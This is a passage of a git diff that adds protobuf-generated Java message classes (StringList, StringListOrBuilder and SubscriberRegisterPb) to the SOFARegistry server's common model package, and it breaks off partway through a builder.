public static com.alipay.sofa.registry.common.model.client.pb.StringList parseFrom(byte[] data) + throws com.google.protobuf.InvalidProtocolBufferException { + return PARSER.parseFrom(data); + } + + public static com.alipay.sofa.registry.common.model.client.pb.StringList parseFrom( + byte[] data, com.google.protobuf.ExtensionRegistryLite extensionRegistry) + throws com.google.protobuf.InvalidProtocolBufferException { + return PARSER.parseFrom(data, extensionRegistry); + } + + public static com.alipay.sofa.registry.common.model.client.pb.StringList parseFrom( + java.io.InputStream input) throws java.io.IOException { + return com.google.protobuf.GeneratedMessageV3.parseWithIOException(PARSER, input); + } + + public static com.alipay.sofa.registry.common.model.client.pb.StringList parseFrom( + java.io.InputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) + throws java.io.IOException { + return com.google.protobuf.GeneratedMessageV3.parseWithIOException( + PARSER, input, extensionRegistry); + } + + public static com.alipay.sofa.registry.common.model.client.pb.StringList parseDelimitedFrom( + java.io.InputStream input) throws java.io.IOException { + return com.google.protobuf.GeneratedMessageV3.parseDelimitedWithIOException(PARSER, input); + } + + public static com.alipay.sofa.registry.common.model.client.pb.StringList parseDelimitedFrom( + java.io.InputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) + throws java.io.IOException { + return com.google.protobuf.GeneratedMessageV3.parseDelimitedWithIOException( + PARSER, input, extensionRegistry); + } + + public static com.alipay.sofa.registry.common.model.client.pb.StringList parseFrom( + com.google.protobuf.CodedInputStream input) throws java.io.IOException { + return com.google.protobuf.GeneratedMessageV3.parseWithIOException(PARSER, input); + } + + public static com.alipay.sofa.registry.common.model.client.pb.StringList parseFrom( + com.google.protobuf.CodedInputStream input, + com.google.protobuf.ExtensionRegistryLite extensionRegistry) + throws java.io.IOException { + return com.google.protobuf.GeneratedMessageV3.parseWithIOException( + PARSER, input, extensionRegistry); + } + + public Builder newBuilderForType() { + return newBuilder(); + } + + public static Builder newBuilder() { + return DEFAULT_INSTANCE.toBuilder(); + } + + public static Builder newBuilder( + com.alipay.sofa.registry.common.model.client.pb.StringList prototype) { + return DEFAULT_INSTANCE.toBuilder().mergeFrom(prototype); + } + + public Builder toBuilder() { + return this == DEFAULT_INSTANCE ? new Builder() : new Builder().mergeFrom(this); + } + + @java.lang.Override + protected Builder newBuilderForType(com.google.protobuf.GeneratedMessageV3.BuilderParent parent) { + Builder builder = new Builder(parent); + return builder; + } + /** Protobuf type {@code StringList} */ + public static final class Builder extends com.google.protobuf.GeneratedMessageV3.Builder + implements + // @@protoc_insertion_point(builder_implements:StringList) + com.alipay.sofa.registry.common.model.client.pb.StringListOrBuilder { + public static final com.google.protobuf.Descriptors.Descriptor getDescriptor() { + return com.alipay.sofa.registry.common.model.client.pb.AppDiscoveryMetaPb + .internal_static_StringList_descriptor; + } + + protected com.google.protobuf.GeneratedMessageV3.FieldAccessorTable + internalGetFieldAccessorTable() { + return com.alipay.sofa.registry.common.model.client.pb.AppDiscoveryMetaPb + .internal_static_StringList_fieldAccessorTable + .ensureFieldAccessorsInitialized( + com.alipay.sofa.registry.common.model.client.pb.StringList.class, + com.alipay.sofa.registry.common.model.client.pb.StringList.Builder.class); + } + + // Construct using com.alipay.sofa.registry.common.model.client.pb.StringList.newBuilder() + private Builder() { + maybeForceBuilderInitialization(); + } + + private Builder(com.google.protobuf.GeneratedMessageV3.BuilderParent parent) { + super(parent); + maybeForceBuilderInitialization(); + } + + private void maybeForceBuilderInitialization() { + if (com.google.protobuf.GeneratedMessageV3.alwaysUseFieldBuilders) {} + } + + public Builder clear() { + super.clear(); + values_ = com.google.protobuf.LazyStringArrayList.EMPTY; + bitField0_ = (bitField0_ & ~0x00000001); + return this; + } + + public com.google.protobuf.Descriptors.Descriptor getDescriptorForType() { + return com.alipay.sofa.registry.common.model.client.pb.AppDiscoveryMetaPb + .internal_static_StringList_descriptor; + } + + public com.alipay.sofa.registry.common.model.client.pb.StringList getDefaultInstanceForType() { + return com.alipay.sofa.registry.common.model.client.pb.StringList.getDefaultInstance(); + } + + public com.alipay.sofa.registry.common.model.client.pb.StringList build() { + com.alipay.sofa.registry.common.model.client.pb.StringList result = buildPartial(); + if (!result.isInitialized()) { + throw newUninitializedMessageException(result); + } + return result; + } + + public com.alipay.sofa.registry.common.model.client.pb.StringList buildPartial() { + com.alipay.sofa.registry.common.model.client.pb.StringList result = + new com.alipay.sofa.registry.common.model.client.pb.StringList(this); + int from_bitField0_ = bitField0_; + if (((bitField0_ & 0x00000001) == 0x00000001)) { + values_ = values_.getUnmodifiableView(); + bitField0_ = (bitField0_ & ~0x00000001); + } + result.values_ = values_; + onBuilt(); + return result; + } + + public Builder clone() { + return (Builder) super.clone(); + } + + public Builder setField( + com.google.protobuf.Descriptors.FieldDescriptor field, java.lang.Object value) { + return (Builder) super.setField(field, value); + } + + public Builder clearField(com.google.protobuf.Descriptors.FieldDescriptor field) { + return (Builder) super.clearField(field); + } + + public Builder clearOneof(com.google.protobuf.Descriptors.OneofDescriptor oneof) { + return (Builder) super.clearOneof(oneof); + } + + public Builder setRepeatedField( + com.google.protobuf.Descriptors.FieldDescriptor field, int index, java.lang.Object value) { + return (Builder) super.setRepeatedField(field, index, value); + } + + public Builder addRepeatedField( + com.google.protobuf.Descriptors.FieldDescriptor field, java.lang.Object value) { + return (Builder) super.addRepeatedField(field, value); + } + + public Builder mergeFrom(com.google.protobuf.Message other) { + if (other instanceof com.alipay.sofa.registry.common.model.client.pb.StringList) { + return mergeFrom((com.alipay.sofa.registry.common.model.client.pb.StringList) other); + } else { + super.mergeFrom(other); + return this; + } + } + + public Builder mergeFrom(com.alipay.sofa.registry.common.model.client.pb.StringList other) { + if (other == com.alipay.sofa.registry.common.model.client.pb.StringList.getDefaultInstance()) + return this; + if (!other.values_.isEmpty()) { + if (values_.isEmpty()) { + values_ = other.values_; + bitField0_ = (bitField0_ & ~0x00000001); + } else { + ensureValuesIsMutable(); + values_.addAll(other.values_); + } + onChanged(); + } + this.mergeUnknownFields(other.unknownFields); + onChanged(); + return this; + } + + public final boolean isInitialized() { + return true; + } + + public Builder mergeFrom( + com.google.protobuf.CodedInputStream input, + com.google.protobuf.ExtensionRegistryLite extensionRegistry) + throws java.io.IOException { + com.alipay.sofa.registry.common.model.client.pb.StringList parsedMessage = null; + try { + parsedMessage = PARSER.parsePartialFrom(input, extensionRegistry); + } catch (com.google.protobuf.InvalidProtocolBufferException e) { + parsedMessage = + (com.alipay.sofa.registry.common.model.client.pb.StringList) e.getUnfinishedMessage(); + throw e.unwrapIOException(); + } finally { + if (parsedMessage != null) { + mergeFrom(parsedMessage); + } + } + return this; + } + + private int bitField0_; + + private com.google.protobuf.LazyStringList values_ = + com.google.protobuf.LazyStringArrayList.EMPTY; + + private void ensureValuesIsMutable() { + if (!((bitField0_ & 0x00000001) == 0x00000001)) { + values_ = new com.google.protobuf.LazyStringArrayList(values_); + bitField0_ |= 0x00000001; + } + } + /** repeated string values = 1; */ + public com.google.protobuf.ProtocolStringList getValuesList() { + return values_.getUnmodifiableView(); + } + /** repeated string values = 1; */ + public int getValuesCount() { + return values_.size(); + } + /** repeated string values = 1; */ + public java.lang.String getValues(int index) { + return values_.get(index); + } + /** repeated string values = 1; */ + public com.google.protobuf.ByteString getValuesBytes(int index) { + return values_.getByteString(index); + } + /** repeated string values = 1; */ + public Builder setValues(int index, java.lang.String value) { + if (value == null) { + throw new NullPointerException(); + } + ensureValuesIsMutable(); + values_.set(index, value); + onChanged(); + return this; + } + /** repeated string values = 1; */ + public Builder addValues(java.lang.String value) { + if (value == null) { + throw new NullPointerException(); + } + ensureValuesIsMutable(); + values_.add(value); + onChanged(); + return this; + } + /** repeated string values = 1; */ + public Builder addAllValues(java.lang.Iterable values) { + ensureValuesIsMutable(); + com.google.protobuf.AbstractMessageLite.Builder.addAll(values, values_); + onChanged(); + return this; + } + /** repeated string values = 1; */ + public Builder clearValues() { + values_ = com.google.protobuf.LazyStringArrayList.EMPTY; + bitField0_ = (bitField0_ & ~0x00000001); + onChanged(); + return this; + } + /** repeated string values = 1; */ + public Builder addValuesBytes(com.google.protobuf.ByteString value) { + if (value == null) { + throw new NullPointerException(); + } + checkByteStringIsUtf8(value); + ensureValuesIsMutable(); + values_.add(value); + onChanged(); + return this; + } + + public final Builder setUnknownFields(final com.google.protobuf.UnknownFieldSet unknownFields) { + return super.setUnknownFieldsProto3(unknownFields); + } + + public final Builder mergeUnknownFields( + final com.google.protobuf.UnknownFieldSet unknownFields) { + return super.mergeUnknownFields(unknownFields); + } + + // @@protoc_insertion_point(builder_scope:StringList) + } + + // @@protoc_insertion_point(class_scope:StringList) + private static final com.alipay.sofa.registry.common.model.client.pb.StringList DEFAULT_INSTANCE; + + static { + DEFAULT_INSTANCE = new com.alipay.sofa.registry.common.model.client.pb.StringList(); + } + + public static com.alipay.sofa.registry.common.model.client.pb.StringList getDefaultInstance() { + return DEFAULT_INSTANCE; + } + + private static final com.google.protobuf.Parser PARSER = + new com.google.protobuf.AbstractParser() { + public StringList parsePartialFrom( + com.google.protobuf.CodedInputStream input, + com.google.protobuf.ExtensionRegistryLite extensionRegistry) + throws com.google.protobuf.InvalidProtocolBufferException { + return new StringList(input, extensionRegistry); + } + }; + + public static com.google.protobuf.Parser parser() { + return PARSER; + } + + @java.lang.Override + public com.google.protobuf.Parser getParserForType() { + return PARSER; + } + + public com.alipay.sofa.registry.common.model.client.pb.StringList getDefaultInstanceForType() { + return DEFAULT_INSTANCE; + } +} diff --git a/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/client/pb/StringListOrBuilder.java b/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/client/pb/StringListOrBuilder.java new file mode 100644 index 000000000..a58a8e101 --- /dev/null +++ b/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/client/pb/StringListOrBuilder.java @@ -0,0 +1,32 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.common.model.client.pb; + +public interface StringListOrBuilder + extends + // @@protoc_insertion_point(interface_extends:StringList) + com.google.protobuf.MessageOrBuilder { + + /** repeated string values = 1; */ + java.util.List getValuesList(); + /** repeated string values = 1; */ + int getValuesCount(); + /** repeated string values = 1; */ + java.lang.String getValues(int index); + /** repeated string values = 1; */ + com.google.protobuf.ByteString getValuesBytes(int index); +} diff --git a/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/client/pb/SubscriberRegisterPb.java b/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/client/pb/SubscriberRegisterPb.java new file mode 100644 index 000000000..6d006fe18 --- /dev/null +++ b/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/client/pb/SubscriberRegisterPb.java @@ -0,0 +1,706 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.common.model.client.pb; + +/** Protobuf type {@code SubscriberRegisterPb} */ +public final class SubscriberRegisterPb extends com.google.protobuf.GeneratedMessageV3 + implements + // @@protoc_insertion_point(message_implements:SubscriberRegisterPb) + SubscriberRegisterPbOrBuilder { + private static final long serialVersionUID = 0L; + // Use SubscriberRegisterPb.newBuilder() to construct. + private SubscriberRegisterPb(com.google.protobuf.GeneratedMessageV3.Builder builder) { + super(builder); + } + + private SubscriberRegisterPb() { + scope_ = ""; + } + + @java.lang.Override + public final com.google.protobuf.UnknownFieldSet getUnknownFields() { + return this.unknownFields; + } + + private SubscriberRegisterPb( + com.google.protobuf.CodedInputStream input, + com.google.protobuf.ExtensionRegistryLite extensionRegistry) + throws com.google.protobuf.InvalidProtocolBufferException { + this(); + if (extensionRegistry == null) { + throw new java.lang.NullPointerException(); + } + int mutable_bitField0_ = 0; + com.google.protobuf.UnknownFieldSet.Builder unknownFields = + com.google.protobuf.UnknownFieldSet.newBuilder(); + try { + boolean done = false; + while (!done) { + int tag = input.readTag(); + switch (tag) { + case 0: + done = true; + break; + default: + { + if (!parseUnknownFieldProto3(input, unknownFields, extensionRegistry, tag)) { + done = true; + } + break; + } + case 10: + { + java.lang.String s = input.readStringRequireUtf8(); + + scope_ = s; + break; + } + case 18: + { + com.alipay.sofa.registry.common.model.client.pb.BaseRegisterPb.Builder subBuilder = + null; + if (baseRegister_ != null) { + subBuilder = baseRegister_.toBuilder(); + } + baseRegister_ = + input.readMessage( + com.alipay.sofa.registry.common.model.client.pb.BaseRegisterPb.parser(), + extensionRegistry); + if (subBuilder != null) { + subBuilder.mergeFrom(baseRegister_); + baseRegister_ = subBuilder.buildPartial(); + } + + break; + } + } + } + } catch (com.google.protobuf.InvalidProtocolBufferException e) { + throw e.setUnfinishedMessage(this); + } catch (java.io.IOException e) { + throw new com.google.protobuf.InvalidProtocolBufferException(e).setUnfinishedMessage(this); + } finally { + this.unknownFields = unknownFields.build(); + makeExtensionsImmutable(); + } + } + + public static final com.google.protobuf.Descriptors.Descriptor getDescriptor() { + return com.alipay.sofa.registry.common.model.client.pb.SubscriberRegisterPbOuterClass + .internal_static_SubscriberRegisterPb_descriptor; + } + + protected com.google.protobuf.GeneratedMessageV3.FieldAccessorTable + internalGetFieldAccessorTable() { + return com.alipay.sofa.registry.common.model.client.pb.SubscriberRegisterPbOuterClass + .internal_static_SubscriberRegisterPb_fieldAccessorTable + .ensureFieldAccessorsInitialized( + com.alipay.sofa.registry.common.model.client.pb.SubscriberRegisterPb.class, + com.alipay.sofa.registry.common.model.client.pb.SubscriberRegisterPb.Builder.class); + } + + public static final int SCOPE_FIELD_NUMBER = 1; + private volatile java.lang.Object scope_; + /** string scope = 1; */ + public java.lang.String getScope() { + java.lang.Object ref = scope_; + if (ref instanceof java.lang.String) { + return (java.lang.String) ref; + } else { + com.google.protobuf.ByteString bs = (com.google.protobuf.ByteString) ref; + java.lang.String s = bs.toStringUtf8(); + scope_ = s; + return s; + } + } + /** string scope = 1; */ + public com.google.protobuf.ByteString getScopeBytes() { + java.lang.Object ref = scope_; + if (ref instanceof java.lang.String) { + com.google.protobuf.ByteString b = + com.google.protobuf.ByteString.copyFromUtf8((java.lang.String) ref); + scope_ = b; + return b; + } else { + return (com.google.protobuf.ByteString) ref; + } + } + + public static final int BASEREGISTER_FIELD_NUMBER = 2; + private com.alipay.sofa.registry.common.model.client.pb.BaseRegisterPb baseRegister_; + /** .BaseRegisterPb baseRegister = 2; */ + public boolean hasBaseRegister() { + return baseRegister_ != null; + } + /** .BaseRegisterPb baseRegister = 2; */ + public com.alipay.sofa.registry.common.model.client.pb.BaseRegisterPb getBaseRegister() { + return baseRegister_ == null + ? com.alipay.sofa.registry.common.model.client.pb.BaseRegisterPb.getDefaultInstance() + : baseRegister_; + } + /** .BaseRegisterPb baseRegister = 2; */ + public com.alipay.sofa.registry.common.model.client.pb.BaseRegisterPbOrBuilder + getBaseRegisterOrBuilder() { + return getBaseRegister(); + } + + private byte memoizedIsInitialized = -1; + + public final boolean isInitialized() { + byte isInitialized = memoizedIsInitialized; + if (isInitialized == 1) return true; + if (isInitialized == 0) return false; + + memoizedIsInitialized = 1; + return true; + } + + public void writeTo(com.google.protobuf.CodedOutputStream output) throws java.io.IOException { + if (!getScopeBytes().isEmpty()) { + com.google.protobuf.GeneratedMessageV3.writeString(output, 1, scope_); + } + if (baseRegister_ != null) { + output.writeMessage(2, getBaseRegister()); + } + unknownFields.writeTo(output); + } + + public int getSerializedSize() { + int size = memoizedSize; + if (size != -1) return size; + + size = 0; + if (!getScopeBytes().isEmpty()) { + size += com.google.protobuf.GeneratedMessageV3.computeStringSize(1, scope_); + } + if (baseRegister_ != null) { + size += com.google.protobuf.CodedOutputStream.computeMessageSize(2, getBaseRegister()); + } + size += unknownFields.getSerializedSize(); + memoizedSize = size; + return size; + } + + @java.lang.Override + public boolean equals(final java.lang.Object obj) { + if (obj == this) { + return true; + } + if (!(obj instanceof com.alipay.sofa.registry.common.model.client.pb.SubscriberRegisterPb)) { + return super.equals(obj); + } + com.alipay.sofa.registry.common.model.client.pb.SubscriberRegisterPb other = + (com.alipay.sofa.registry.common.model.client.pb.SubscriberRegisterPb) obj; + + boolean result = true; + result = result && getScope().equals(other.getScope()); + result = result && (hasBaseRegister() == other.hasBaseRegister()); + if (hasBaseRegister()) { + result = result && getBaseRegister().equals(other.getBaseRegister()); + } + result = result && unknownFields.equals(other.unknownFields); + return result; + } + + @java.lang.Override + public int hashCode() { + if (memoizedHashCode != 0) { + return memoizedHashCode; + } + int hash = 41; + hash = (19 * hash) + getDescriptor().hashCode(); + hash = (37 * hash) + SCOPE_FIELD_NUMBER; + hash = (53 * hash) + getScope().hashCode(); + if (hasBaseRegister()) { + hash = (37 * hash) + BASEREGISTER_FIELD_NUMBER; + hash = (53 * hash) + getBaseRegister().hashCode(); + } + hash = (29 * hash) + unknownFields.hashCode(); + memoizedHashCode = hash; + return hash; + } + + public static com.alipay.sofa.registry.common.model.client.pb.SubscriberRegisterPb parseFrom( + java.nio.ByteBuffer data) throws com.google.protobuf.InvalidProtocolBufferException { + return PARSER.parseFrom(data); + } + + public static com.alipay.sofa.registry.common.model.client.pb.SubscriberRegisterPb parseFrom( + java.nio.ByteBuffer data, com.google.protobuf.ExtensionRegistryLite extensionRegistry) + throws com.google.protobuf.InvalidProtocolBufferException { + return PARSER.parseFrom(data, extensionRegistry); + } + + public static com.alipay.sofa.registry.common.model.client.pb.SubscriberRegisterPb parseFrom( + com.google.protobuf.ByteString data) + throws com.google.protobuf.InvalidProtocolBufferException { + return PARSER.parseFrom(data); + } + + public static com.alipay.sofa.registry.common.model.client.pb.SubscriberRegisterPb parseFrom( + com.google.protobuf.ByteString data, + com.google.protobuf.ExtensionRegistryLite extensionRegistry) + throws com.google.protobuf.InvalidProtocolBufferException { + return PARSER.parseFrom(data, extensionRegistry); + } + + public static com.alipay.sofa.registry.common.model.client.pb.SubscriberRegisterPb parseFrom( + byte[] data) throws com.google.protobuf.InvalidProtocolBufferException { + return PARSER.parseFrom(data); + } + + public static com.alipay.sofa.registry.common.model.client.pb.SubscriberRegisterPb parseFrom( + byte[] data, com.google.protobuf.ExtensionRegistryLite extensionRegistry) + throws com.google.protobuf.InvalidProtocolBufferException { + return PARSER.parseFrom(data, extensionRegistry); + } + + public static com.alipay.sofa.registry.common.model.client.pb.SubscriberRegisterPb parseFrom( + java.io.InputStream input) throws java.io.IOException { + return com.google.protobuf.GeneratedMessageV3.parseWithIOException(PARSER, input); + } + + public static com.alipay.sofa.registry.common.model.client.pb.SubscriberRegisterPb parseFrom( + java.io.InputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) + throws java.io.IOException { + return com.google.protobuf.GeneratedMessageV3.parseWithIOException( + PARSER, input, extensionRegistry); + } + + public static com.alipay.sofa.registry.common.model.client.pb.SubscriberRegisterPb + parseDelimitedFrom(java.io.InputStream input) throws java.io.IOException { + return com.google.protobuf.GeneratedMessageV3.parseDelimitedWithIOException(PARSER, input); + } + + public static com.alipay.sofa.registry.common.model.client.pb.SubscriberRegisterPb + parseDelimitedFrom( + java.io.InputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) + throws java.io.IOException { + return com.google.protobuf.GeneratedMessageV3.parseDelimitedWithIOException( + PARSER, input, extensionRegistry); + } + + public static com.alipay.sofa.registry.common.model.client.pb.SubscriberRegisterPb parseFrom( + com.google.protobuf.CodedInputStream input) throws java.io.IOException { + return com.google.protobuf.GeneratedMessageV3.parseWithIOException(PARSER, input); + } + + public static com.alipay.sofa.registry.common.model.client.pb.SubscriberRegisterPb parseFrom( + com.google.protobuf.CodedInputStream input, + com.google.protobuf.ExtensionRegistryLite extensionRegistry) + throws java.io.IOException { + return com.google.protobuf.GeneratedMessageV3.parseWithIOException( + PARSER, input, extensionRegistry); + } + + public Builder newBuilderForType() { + return newBuilder(); + } + + public static Builder newBuilder() { + return DEFAULT_INSTANCE.toBuilder(); + } + + public static Builder newBuilder( + com.alipay.sofa.registry.common.model.client.pb.SubscriberRegisterPb prototype) { + return DEFAULT_INSTANCE.toBuilder().mergeFrom(prototype); + } + + public Builder toBuilder() { + return this == DEFAULT_INSTANCE ? new Builder() : new Builder().mergeFrom(this); + } + + @java.lang.Override + protected Builder newBuilderForType(com.google.protobuf.GeneratedMessageV3.BuilderParent parent) { + Builder builder = new Builder(parent); + return builder; + } + /** Protobuf type {@code SubscriberRegisterPb} */ + public static final class Builder extends com.google.protobuf.GeneratedMessageV3.Builder + implements + // @@protoc_insertion_point(builder_implements:SubscriberRegisterPb) + com.alipay.sofa.registry.common.model.client.pb.SubscriberRegisterPbOrBuilder { + public static final com.google.protobuf.Descriptors.Descriptor getDescriptor() { + return com.alipay.sofa.registry.common.model.client.pb.SubscriberRegisterPbOuterClass + .internal_static_SubscriberRegisterPb_descriptor; + } + + protected com.google.protobuf.GeneratedMessageV3.FieldAccessorTable + internalGetFieldAccessorTable() { + return com.alipay.sofa.registry.common.model.client.pb.SubscriberRegisterPbOuterClass + .internal_static_SubscriberRegisterPb_fieldAccessorTable + .ensureFieldAccessorsInitialized( + com.alipay.sofa.registry.common.model.client.pb.SubscriberRegisterPb.class, + com.alipay.sofa.registry.common.model.client.pb.SubscriberRegisterPb.Builder.class); + } + + // Construct using + // com.alipay.sofa.registry.common.model.client.pb.SubscriberRegisterPb.newBuilder() + private Builder() { + maybeForceBuilderInitialization(); + } + + private Builder(com.google.protobuf.GeneratedMessageV3.BuilderParent parent) { + super(parent); + maybeForceBuilderInitialization(); + } + + private void maybeForceBuilderInitialization() { + if (com.google.protobuf.GeneratedMessageV3.alwaysUseFieldBuilders) {} + } + + public Builder clear() { + super.clear(); + scope_ = ""; + + if (baseRegisterBuilder_ == null) { + baseRegister_ = null; + } else { + baseRegister_ = null; + baseRegisterBuilder_ = null; + } + return this; + } + + public com.google.protobuf.Descriptors.Descriptor getDescriptorForType() { + return com.alipay.sofa.registry.common.model.client.pb.SubscriberRegisterPbOuterClass + .internal_static_SubscriberRegisterPb_descriptor; + } + + public com.alipay.sofa.registry.common.model.client.pb.SubscriberRegisterPb + getDefaultInstanceForType() { + return com.alipay.sofa.registry.common.model.client.pb.SubscriberRegisterPb + .getDefaultInstance(); + } + + public com.alipay.sofa.registry.common.model.client.pb.SubscriberRegisterPb build() { + com.alipay.sofa.registry.common.model.client.pb.SubscriberRegisterPb result = buildPartial(); + if (!result.isInitialized()) { + throw newUninitializedMessageException(result); + } + return result; + } + + public com.alipay.sofa.registry.common.model.client.pb.SubscriberRegisterPb buildPartial() { + com.alipay.sofa.registry.common.model.client.pb.SubscriberRegisterPb result = + new com.alipay.sofa.registry.common.model.client.pb.SubscriberRegisterPb(this); + result.scope_ = scope_; + if (baseRegisterBuilder_ == null) { + result.baseRegister_ = baseRegister_; + } else { + result.baseRegister_ = baseRegisterBuilder_.build(); + } + onBuilt(); + return result; + } + + public Builder clone() { + return (Builder) super.clone(); + } + + public Builder setField( + com.google.protobuf.Descriptors.FieldDescriptor field, java.lang.Object value) { + return (Builder) super.setField(field, value); + } + + public Builder clearField(com.google.protobuf.Descriptors.FieldDescriptor field) { + return (Builder) super.clearField(field); + } + + public Builder clearOneof(com.google.protobuf.Descriptors.OneofDescriptor oneof) { + return (Builder) super.clearOneof(oneof); + } + + public Builder setRepeatedField( + com.google.protobuf.Descriptors.FieldDescriptor field, int index, java.lang.Object value) { + return (Builder) super.setRepeatedField(field, index, value); + } + + public Builder addRepeatedField( + com.google.protobuf.Descriptors.FieldDescriptor field, java.lang.Object value) { + return (Builder) super.addRepeatedField(field, value); + } + + public Builder mergeFrom(com.google.protobuf.Message other) { + if (other instanceof com.alipay.sofa.registry.common.model.client.pb.SubscriberRegisterPb) { + return mergeFrom( + (com.alipay.sofa.registry.common.model.client.pb.SubscriberRegisterPb) other); + } else { + super.mergeFrom(other); + return this; + } + } + + public Builder mergeFrom( + com.alipay.sofa.registry.common.model.client.pb.SubscriberRegisterPb other) { + if (other + == com.alipay.sofa.registry.common.model.client.pb.SubscriberRegisterPb + .getDefaultInstance()) return this; + if (!other.getScope().isEmpty()) { + scope_ = other.scope_; + onChanged(); + } + if (other.hasBaseRegister()) { + mergeBaseRegister(other.getBaseRegister()); + } + this.mergeUnknownFields(other.unknownFields); + onChanged(); + return this; + } + + public final boolean isInitialized() { + return true; + } + + public Builder mergeFrom( + com.google.protobuf.CodedInputStream input, + com.google.protobuf.ExtensionRegistryLite extensionRegistry) + throws java.io.IOException { + com.alipay.sofa.registry.common.model.client.pb.SubscriberRegisterPb parsedMessage = null; + try { + parsedMessage = PARSER.parsePartialFrom(input, extensionRegistry); + } catch (com.google.protobuf.InvalidProtocolBufferException e) { + parsedMessage = + (com.alipay.sofa.registry.common.model.client.pb.SubscriberRegisterPb) + e.getUnfinishedMessage(); + throw e.unwrapIOException(); + } finally { + if (parsedMessage != null) { + mergeFrom(parsedMessage); + } + } + return this; + } + + private java.lang.Object scope_ = ""; + /** string scope = 1; */ + public java.lang.String getScope() { + java.lang.Object ref = scope_; + if (!(ref instanceof java.lang.String)) { + com.google.protobuf.ByteString bs = (com.google.protobuf.ByteString) ref; + java.lang.String s = bs.toStringUtf8(); + scope_ = s; + return s; + } else { + return (java.lang.String) ref; + } + } + /** string scope = 1; */ + public com.google.protobuf.ByteString getScopeBytes() { + java.lang.Object ref = scope_; + if (ref instanceof String) { + com.google.protobuf.ByteString b = + com.google.protobuf.ByteString.copyFromUtf8((java.lang.String) ref); + scope_ = b; + return b; + } else { + return (com.google.protobuf.ByteString) ref; + } + } + /** string scope = 1; */ + public Builder setScope(java.lang.String value) { + if (value == null) { + throw new NullPointerException(); + } + + scope_ = value; + onChanged(); + return this; + } + /** string scope = 1; */ + public Builder clearScope() { + + scope_ = getDefaultInstance().getScope(); + onChanged(); + return this; + } + /** string scope = 1; */ + public Builder setScopeBytes(com.google.protobuf.ByteString value) { + if (value == null) { + throw new NullPointerException(); + } + checkByteStringIsUtf8(value); + + scope_ = value; + onChanged(); + return this; + } + + private com.alipay.sofa.registry.common.model.client.pb.BaseRegisterPb baseRegister_ = null; + private com.google.protobuf.SingleFieldBuilderV3< + com.alipay.sofa.registry.common.model.client.pb.BaseRegisterPb, + com.alipay.sofa.registry.common.model.client.pb.BaseRegisterPb.Builder, + com.alipay.sofa.registry.common.model.client.pb.BaseRegisterPbOrBuilder> + baseRegisterBuilder_; + /** .BaseRegisterPb baseRegister = 2; */ + public boolean hasBaseRegister() { + return baseRegisterBuilder_ != null || baseRegister_ != null; + } + /** .BaseRegisterPb baseRegister = 2; */ + public com.alipay.sofa.registry.common.model.client.pb.BaseRegisterPb getBaseRegister() { + if (baseRegisterBuilder_ == null) { + return baseRegister_ == null + ? com.alipay.sofa.registry.common.model.client.pb.BaseRegisterPb.getDefaultInstance() + : baseRegister_; + } else { + return baseRegisterBuilder_.getMessage(); + } + } + /** .BaseRegisterPb baseRegister = 2; */ + public Builder setBaseRegister( + com.alipay.sofa.registry.common.model.client.pb.BaseRegisterPb value) { + if (baseRegisterBuilder_ == null) { + if (value == null) { + throw new NullPointerException(); + } + baseRegister_ = value; + onChanged(); + } else { + baseRegisterBuilder_.setMessage(value); + } + + return this; + } + /** .BaseRegisterPb baseRegister = 2; */ + public Builder setBaseRegister( + com.alipay.sofa.registry.common.model.client.pb.BaseRegisterPb.Builder builderForValue) { + if (baseRegisterBuilder_ == null) { + baseRegister_ = builderForValue.build(); + onChanged(); + } else { + baseRegisterBuilder_.setMessage(builderForValue.build()); + } + + return this; + } + /** .BaseRegisterPb baseRegister = 2; */ + public Builder mergeBaseRegister( + com.alipay.sofa.registry.common.model.client.pb.BaseRegisterPb value) { + if (baseRegisterBuilder_ == null) { + if (baseRegister_ != null) { + baseRegister_ = + com.alipay.sofa.registry.common.model.client.pb.BaseRegisterPb.newBuilder( + baseRegister_) + .mergeFrom(value) + .buildPartial(); + } else { + baseRegister_ = value; + } + onChanged(); + } else { + baseRegisterBuilder_.mergeFrom(value); + } + + return this; + } + /** .BaseRegisterPb baseRegister = 2; */ + public Builder clearBaseRegister() { + if (baseRegisterBuilder_ == null) { + baseRegister_ = null; + onChanged(); + } else { + baseRegister_ = null; + baseRegisterBuilder_ = null; + } + + return this; + } + /** .BaseRegisterPb baseRegister = 2; */ + public com.alipay.sofa.registry.common.model.client.pb.BaseRegisterPb.Builder + getBaseRegisterBuilder() { + + onChanged(); + return getBaseRegisterFieldBuilder().getBuilder(); + } + /** .BaseRegisterPb baseRegister = 2; */ + public com.alipay.sofa.registry.common.model.client.pb.BaseRegisterPbOrBuilder + getBaseRegisterOrBuilder() { + if (baseRegisterBuilder_ != null) { + return baseRegisterBuilder_.getMessageOrBuilder(); + } else { + return baseRegister_ == null + ? com.alipay.sofa.registry.common.model.client.pb.BaseRegisterPb.getDefaultInstance() + : baseRegister_; + } + } + /** .BaseRegisterPb baseRegister = 2; */ + private 